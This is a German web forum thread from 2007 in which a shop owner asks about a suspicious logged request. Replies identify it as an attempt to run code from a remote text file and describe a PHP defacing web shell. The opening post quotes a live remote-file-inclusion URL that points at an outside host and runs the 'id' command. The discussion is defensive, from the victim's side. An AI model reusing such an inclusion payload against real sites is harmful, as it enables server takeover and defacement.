muskelfood Posted May 19, 2007 Report Share Posted May 19, 2007 Seit einiger Zeit habe ich unter "Wer ist Online" immer eine komische IP Adressen: Z.B: 200.163.252.11 http://www.muskelfood.de/index.php?manu=http://canaldrop.by.ru/cmd/tool25.txt?&cmd=id Weiß jemand was das zu bedeuten hat? Mache mir da einige Sorgen zwecks Angriff usw. Wäre über Hilfe dankbar! Gruß Mario Link to comment Share on other sites More sharing options...
fsit99 Posted May 19, 2007 Report Share Posted May 19, 2007 Seit einiger Zeit habe ich unter "Wer ist Online" immer eine komische IP Adressen: Z.B: 200.163.252.11 http://www.muskelfood.de/index.php?manu=http://canaldrop.by.ru/cmd/tool25.txt?&cmd=id Weiß jemand was das zu bedeuten hat? Mache mir da einige Sorgen zwecks Angriff usw. Wäre über Hilfe dankbar! Gruß Mario Hallo Ja da will einer code aus einer txt-datei bei dir im Web ausführen. Hast Du einen eigenen Server, dann solltest Du mal die Logfiles prüfen, ob er erfolgreich was einspeisen konnte. Wenn du ein Web hast, also Webspace gemietet, wird dein Hoster das prüfen und dem Angreifer aussperren. Bei weiteren Fragen PM mfg oliver Link to comment Share on other sites More sharing options...
Sebastian05 Posted May 19, 2007 Report Share Posted May 19, 2007 sollte man sich vieleicht auch sorgen machen wenn man täglich immer und immer wieder die gleiche IP sieht, allerdings nur artikel sich anschaut und sein warenkob, impressum etc....??? entweder kopiert er alles 1zu1 oder ist gerne auf mein shop... aber fragen kost ja nichts Link to comment Share on other sites More sharing options...
fsit99 Posted May 19, 2007 Report Share Posted May 19, 2007 sollte man sich vieleicht auch sorgen machen wenn man täglich immer und immer wieder die gleiche IP sieht, allerdings nur artikel sich anschaut und sein warenkob, impressum etc....??? entweder kopiert er alles 1zu1 oder ist gerne auf mein shop... aber fragen kost ja nichts Schon mal daran gedacht, das es eine Suchmaschine sein kann? Im oben genannten Beispiel ist es keine Suchmaschine, das steht fest. mfg oliver Link to comment Share on other sites More sharing options...
nosebear Posted May 19, 2007 Report Share Posted May 19, 2007 google spuckt das aus wenn man "tool25.txt" als Suchbegriff eingibt "Defacing Tool 2.0 by r3v3ng4ns" is a suite of php based scripts that allows the attacker to send commands to the server primarily with the intent to deface web sites.". In our experience the script is often used to download further malware using wget/curl, or to test for the presence of vulnerable scripts by attempting commands such as 'id' or 'uname'. It seems that the script can also be uploaded to PHP/Apache servers to provide an easily accessible set of utilities for executing commands, searching for files. Scheint also niemand zu sein, dem deine Seite gefällt.. der Frank Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.